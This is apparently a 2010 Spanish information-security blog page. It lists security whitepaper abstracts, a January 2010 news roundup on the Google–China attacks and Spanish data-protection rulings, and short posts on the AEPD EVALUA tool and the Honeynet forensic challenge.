"While the concept of passing a Windows password hash has been around for some time, the release of publicly available tools has taken the first major step towards harnessing the true power of this attack. Although such tools have not yet targeted Microsoft’s implementation of Kerberos, all organizations are strongly encouraged to move towards pure Kerberos deployments in preparation for PKI integration. The evolving nature of this attack puts under pressure the issue of passwords as a valid identifier thus requiring organizations to use an alternate credential form such as digital certificates."
Stack Based Overflows: Detect & Exploit (Morton Christiansen)
"Buffer overflows remain some of the most serious and widespread vulnerabilities that exist, often giving an attacker complete control over the compromised system. Thus, in depth knowledge of how these vulnerabilities and exploits work is of utmost importance to penetration testers and incident handlers. This report provides the reader with a basic understanding of how stack based overflows work in practice. This is illustrated, while at the same time uncovering new vulnerabilities in the latest version of Windows XP."
Finding dsniff on Your Network (Richard Duffy)
"This paper covers some ways to detect dsniff and two of its utilities, arpspoof and macof, on a network."
The Pentest Perfect Storm (Kevin Johnson, Ed Skoulis, Joshua Wright)
Part I
Part II

Scripting

Using Scripts to Exploit and Mitigate Risks (Robert G. Rodriguez)
"This paper discusses how scripts can best help you and your unique situations by covering some of the commands that really make a script what it is; powerful."
Using The WinBatch Scripting Language To Automate Security In An NT4 Environment (Terry Chapman)
"In this document I will endeavor to guide you through a couple of relatively simple scripts in order to demonstrate that getting started with scripting is not as a daunting task as you may have considered."

Forensics

Techniques and Tools for Recovering and Analyzing Data from Volatile Memory (Kristine Amari)
"There are many relatively new tools available that have been developed in order to recover and dissect the information that can be gleaned from volatile memory, but because this is a relatively new and fast-growing field many forensic analysts do not know or take advantage of these assets."
Data Carving Concepts (Antonio Merola)
Mobile Device Forensics (Andrew Martin)
Forensic Analysis of a Compromised Intranet Server (Roberto Obialero)
"This document details the forensic analysis process of a compromised Intranet server, from the verification stage to the dissection of malware code, supported by an explanation of the followed methodology."
Forensic Analysis of a SQL Server 2005 Database Server (Kevvie Fowler)
A Ten Step Process for Forensic Readiness (Robert Rowlingson)

Misc

Recopilatorio Notícias Enero 2010

noreply@blogger.com (Ramon Vicens) — Mon, 01 Feb 2010 14:00:00 +0000

Una nueva funcionalidad de Facebook puede convertirse en instrumento de ciberacoso

"Una funcionalidad lanzada recientemente por Facebook es explotable como herramienta de acoso si cae en malas manos, según ha advertido F-Secure.El propósito de tal funcionalidad es permitir a los usuarios de Facebook responder directamente desde sus cuentas de correo cuando reciben alguna notificación de llegada de nuevos correos que incluya mensajes publicados en sus cuentas Facebook. Pueden así responder sin necesidad de introducirse antes en el sitio de networking social, eliminando así un paso y, por consiguiente, ahorrando tiempo."

Google amenaza con retirarse de China

"Google amenazó con retirarse de China, al retirar los filtros en los resultados de su buscador web y plantear una serie de negociaciones con autoridades del gobierno asiático para considerar la viabilidad del servicio.

La medida adoptada responde a una serie de ataques informáticos que registró la compañía estadounidense en las cuentas de Gmail de diversos activistas de derechos humanos localizados tanto en China como en Europa y Estados Unidos.

Pekín no realizó comentarios significativos desde que Google indicó que no acatará la censura y podría cerrar su servicios de búsquedas web, en lengua china, debido a los ataques cibernéticos a los disidentes que utilizaban su servicio Gmail y a compañías."

China lanzo varios ataques hacker contra compañías petroleras Americanas en el 2008

"Según ha revelado un reciente informe del THE MONITOR, un grupo de presuntos Hackers Chinos lanzaron ataques de hacking contra al menos tres compañías petroleras de los EE.UU. Marathon Oil, Exxon Mobil y Conoco Phillips, que se vieron afectadas por los asaltos hackers y según el informe publicado hoy en el Christian Science Monitor tenían como origen la RPC Republica Popular China. La reciente revelación de estos ataques se producen a raíz de que Google y al menos otras 30 empresas de alta tecnología fueron hace poco el blanco de los ataques de hackers chinos, cuyas investigaciones señalan como origen china. Los ataques hacker ejecutados en el 2008 se suman ahora a la creciente preocupación general por el aumento de la inseguridad que está emergiendo en Internet y han provocado una protesta formal de los Estados Unidos ante el Gobierno Chino, que ha negado inmediatamente cualquier participación en los ataque y ha afirmado que también ha sido víctima de numerosos ataques.

El informe publicado por THE MONITOR está basado en cinco largos meses de investigaciones, y arroja como resultado docenas de computadoras y robos de datos a través de las tres empresas vulnerables a los ataques. Los robos de informaciones sensibles han sido posibles usando software espía que fue diseñado a medida para evadir cualquier tipo de detección y control que las empresas pudieran tener instalados como protección Informática. Al parecer el primer ataque ocurrió en noviembre de 2008, precisamente a través del envió de emails con la técnica (E-P) del e-mail Poison (e-mail envenenado) dirigidos a numerosos ejecutivos de alto nivel en las empresas. Las cartas, que contenían solicitudes de beneficiarios para analizar la Ley de Estabilización Económica, estaban falsificadas de tal modo que lograron engañar a los receptores haciéndoles creer que provenían de personas conocidas.

Publican el código utilizado en el ataque a Google

"El ataque sufrido por Google y una treintena de empresas norteamericanas sigue arrastrando consecuencias. La última, el riesgo aún existente ante la publicación en una página web del código utilizado para perpetrar estos ataques. Por su parte, el gobierno alemán ha solicitado a los usuarios a buscar alternativas a la hora de utilizar el popular buscador y al uso de la versión de Explorer afectada por esta vulnerabilidad hasta que se solvente.

Cabe recordar que este ataque se ha producido a través de un fallo detectado, además de en determinados programas corporativos, en Internet Explorer 6 cuando se ejecuta sobre equipos con sistema operativo XP aunque, de acuerdo con Marcus, puede modificarse para su ejecución en versiones más recientes del navegador. Y es que, tal y como han descubierto, un hacker puede utilizar el código para ejecutar software no autorizado en el equipo de una víctima haciéndole creer que está viendo una página web que en realidad contiene código malicioso. "

Tras conflicto con Google, nace versión trucha en China

"Después de la reciente tensión entre el Gobierno Chino y la transnacional Google, una estudiante universitaria de ese país creó Goojje.com, una versión “trucha” del servidor.

En China no sólo se copian DVD, ropa de marca o cadenas de café. Ahora, Goojje es la nueva versión china de Google, vigente desde el 14 de enero, sólo dos días después de que comenzara el conflicto entre el buscador de internet y las autoridades chinas por las cuentas de mail “hackeadas” y la censura."

Bienvenido a mis cuentas, la contraseña es 123456

"A pesar de las continuas recomendaciones de los expertos en seguridad informática, un informe revela que las claves utilizadas para acceder a diversos sistemas son tan simples como "abc123" o "password"

Pese a todos los informes de violaciones de la seguridad de Internet a lo largo de los años, incluyendo los recientes ataques al servicio de correo electrónico de Google , los usuarios siguen sin reaccionar ante este tipo de situaciones.

Según un análisis, uno de cada cinco usuarios de la red aún decide dejar el equivalente digital de una llave bajo la maceta o la alfombra: eligen claves simples, fáciles de adivinar como "abc123", "iloveyou" o incluso "password" para proteger sus datos.

Imperva descubrió que casi el 1 por ciento e los 32 millones de personas analizadas utilizó la clave "123456". La segunda más popular fue "12345". Entre las 20 más populares también se incluyen "qwerty", "abc123" y "princess".

Nueve de cada diez correos electrónicos son fraudulentos

"Según un informe presentado hoy en Madrid por Norton, 9 de cada 10 correos electrónicos son fraudulentos y este tipo de mensajes sigue utilizándose "porque funciona". Asimismo, la compañía señala que la práctica de ciberdelitos está tan extendida que podría incluso superar los ingresos del tráfico de drogas internacional."

Detenidos en Madrid y Barcelona dos 'hackers' que atacaban páginas de internet

"La Policía Nacional ha detenido en Madrid y Barcelona a dos hackers o piratas electrónicos que atacaban múltiples páginas de internet, entre ellas las web de la Policía británica, de la Universidad de Harvard y las ediciones digitales de los diarios El País y As. También descargaban documentos y comunicaciones privadas de los usuarios de un foro.

Uno de los arrestados administraba una web, ahora clausurada por orden judicial, en la que publicaba artículos sobre técnicas y herramientas para llevar a cabo acciones de piratería en la Red, según ha informado la Policía. Los agentes averiguaron que las conexiones a internet se realizaban desde los domicilios de los detenidos, en Madrid y Barcelona."

La Ley Orgánica de Protección de Datos cumple hoy una década

"La Ley Orgánica de Protección de Datos de Carácter Personal (LOPD) cumplirá hoy diez años de su entrada en vigor, que nació con el objetivo de hacer frente a los riesgos que para los derechos de la personalidad pueden suponer el acopio, tratamiento y utilización de datos personales y garantizar y proteger los derechos de los ciudadanos."

Ratifican que Sanidad infringió la ley al divulgar datos de pacientes

"El Servicio Cántabro de Salud (SCS) infringió «gravemente» el deber de secreto recogido en la Ley Orgánica de Protección de Datos (LOPD) al colgar en el tablón de anuncios del Centro de Salud de Santoña datos personales de varios pacientes toxicómanos sometidos al tratamiento de metadona.

Así lo ha estimado la Audiencia Nacional en una sentencia que cierra la polémica suscitada en 2006, a raíz de la dispensación de metadona en los centros de salud. Esta decisión provocó un fuerte enfrentamiento entre grupos de médicos, apoyados por su organización colegial, y la administración sanitaria regional, polémica en la que terció también el Partido Popular, que pidió el «cese fulminante» del gerente de Atención Primaria de Santander-Laredo, José Manuel Liendo."

Aumentan las denuncias a la Agencia Española de protección de Datos

"Los ciudadanos presentaron más de 4.100 denuncias ante la Agencia Española de protección de Datos el pasado año, lo que supone un incremento del 75% respecto a 2008, cuando se contabilizaron 2.300 reclamaciones.

Así lo ha asegurado el director de la Agencia, Artemi Rallo, durante la presentación de Evalúa, una nueva herramienta ‘on line’ dirigida a empresas y organizaciones para que autoevalúen su grado de cumplimiento de la Ley Orgánica de Protección de Datos, coincidiendo con la celebración del Día Europeo de Protección de Datos."

La Audiencia Nacional rebaja el afán recaudatorio de Protección de Datos

"El tribunal deja en 6.000 euros una multa de 60.000 que impuso la Agencia de Protección de Datos a una empresa de gestión de multas que envió datos erróneos de un conductor a un ayuntamiento referidos a una infracción de tráfico.

En las multas por infracciones de la Ley Orgánica de Protección de Datos de carácter Personal debe tenerse en cuenta el principio de proporcionalidad, lo que significa atender las circunstancias de cada caso y las actuaciones que adoptan las empresas para cumplir con la normativa."

Evento: LOPD en el Sector Sanitario: Retos de Seguridad y Privacidad (España)

"Madrid, 10 de febrero de 2010

El tratamiento de datos de carácter personal en el ámbito sanitario constituye un área de especial sensibilidad ya que se ha de conjugar el derecho de los ciudadanos a recibir asistencia médica con el de la protección de sus historiales. En este seminario, se analizarán las claves de este delicado equilibrio, las fórmulas para proteger los datos frente a las nuevas tecnologías así como las resoluciones más novedosas en este terreno."

EVALUA LOPD ya está disponible

noreply@blogger.com (Ramon Vicens) — Mon, 01 Feb 2010 07:30:00 +0000

EVALUA la herramienta de autodiagnóstico de la AEPD ya está disponible para el público. La herramienta permite realizar una autoevaluación del cumplimiento de la Ley de Protección de Datos y del Reglamento de Medidas de Seguridad a aplicar en función de la criticidad de los mismos.

¿Cómo funciona? La herramienta realiza la evaluación en base a cuestionarios que se pueden responder online directamente mediante un checkbox de modo que una vez respondidas todas las preguntas, uno puede obtener un informe en PDF del estado de la Organización respecto a la LOPD y sus medidas técnicas de seguridad.

Destacar que el hecho de no tener que aportar identificación del que realiza la autoevaluación es un punto a favor de la herramienta, ya que los datos introducidos y por lo tanto, potenciales incumplimientos, podrían ser procesados directamente por la AEPD. Adicionalmente, EVALUA incorpora un registro de sesión que permite retomar el test en el punto en que se dejó, así como volver a obtener el informe de resultados.

Si bien hay que reconocer el esfuerzo realizado y felicitar a la AEPD por la herramienta desarrollada, como profesional del mundo de la seguridad, opino que EVALUA es solo una herramienta de autodiagnóstico y obviamente al ser respondida por el Responsable de Seguridad o por el Propietario del fichero/s de la misma Organización, uno tiende a pensar que los resultados obtenidos no serán tan objetivos como los que pueda obtener un auditor externo.

Nuevo Dominio securecorner.net

noreply@blogger.com (Ramon Vicens) — Fri, 29 Jan 2010 19:33:00 +0000

Hola a todos !!!

Después de varios días de absentismo bloggero, he hecho un pequeño cambio en el blog. He registrado un dominio para que podais acceder más fácilmente al blog.

El dominio es: securecorner.net y podreis acceder al blog mediante:

http://securecorner.net
http://www.securecorner.net

e incluso si no actualizais vuestros bookmarks, deberíais seguir accediendo desde http://securecorner.blogspot.com

Firewalls con filtrado por localización geográfica

noreply@blogger.com (Ramon Vicens) — Wed, 20 Jan 2010 23:04:00 +0000

El otro día en Security by Default publicaron un interesante artículo explicando la implementación de un firewall realizado por un coautor del blog. El post me pareció realmente interesante y por ello quería destacarlo. Sin duda, será otra entrada más que añadir en la lista de TODOs.

La herramienta básicamente consiste en combinar la tecnología de la geolocalización de IPs con las políticas de filtrado de iptables mediante un fichero de configuración XML. Algo muy poco usual hoy en día en dichas políticas. No es una protección infalible (si, existen los proxys) pero sin duda alguna ayuda a poner más barreras ante un atacante que se proponga vulnerar un sistema. A mi modo de ver, es una buena idea que permite tener mucho más acotados los accesos permitidos dentro de nuestros sistemas, siempre y cuando localizar la IP origen no conlleve una carga alta y con ello se realentice la transferencia de datos...

Ya sabeis, a leer el post!

Saludos,

Honeynet Project Forensic Challenge

noreply@blogger.com (Ramon Vicens) — Thu, 14 Jan 2010 18:09:00 +0000

En el blog de Honeynet Project anunciaron el pasado dia 12 de enero que a partir del 18 del mismo mes, se colgará el primer "Challenge" forense del 2010, el cual se podrá descargar desde la Web el mismo día. Se dispondrá de dos semanas para presentar los informes y resultados derivados de la investigación. Los resultados saldrán el 15 de febrero, premiando los tres mejores informes recibidos.

Así anunciaba Christian Seifert, Chief Communications Officer de The Honeynet Project la primera hornada de forensic challenges del 2010...

"I am very happy to announce the Honeynet Project Forensic Challenge 2010. The purpose of the Forensic Challenges is to take learning one step farther. Instead of having the Honeynet Project analyze attacks and share their findings, Forensic Challenges give the security community the opportunity to analyze attacks and share their findings. In the end, individuals and organizations not only learn about threats, but also learn how to analyze them. Even better, individuals can access the write-ups from other individuals, and learn about new tools and techniques for analyzing attacks. Best of all, the attacks of the Forensic Challenge are attacks encountered in the wild, real hacks, provided by our members."

Para los curiosos, si quereis consultar algunos retos de años anteriores podeis consultar en la misma página de retos de Honeynet (Scan of the Month, The Reverse Challenge (Ingeniería inversa), The Forensic Challenge ).

Saludos,

noreply@blogger.com (Ramon Vicens) — Mon, 11 Jan 2010 22:53:00 +0000

A continuación adjunto algunos Links de interés en materia de seguridad y forensics..

Distribuciones LiveCD

Penetration test Frameworks/Methodologies

Para practicar ...

Máquinas Virtuales

Virtual Box Images
VMware

Recursos online

Blogs seguridad y forensics

Referencias Legales y Normativas

Fraude y Cibercrimen

Presentación Guardia Civil por Juan Salom Clotet, Jefe del Grupo de Delitos Telemáticos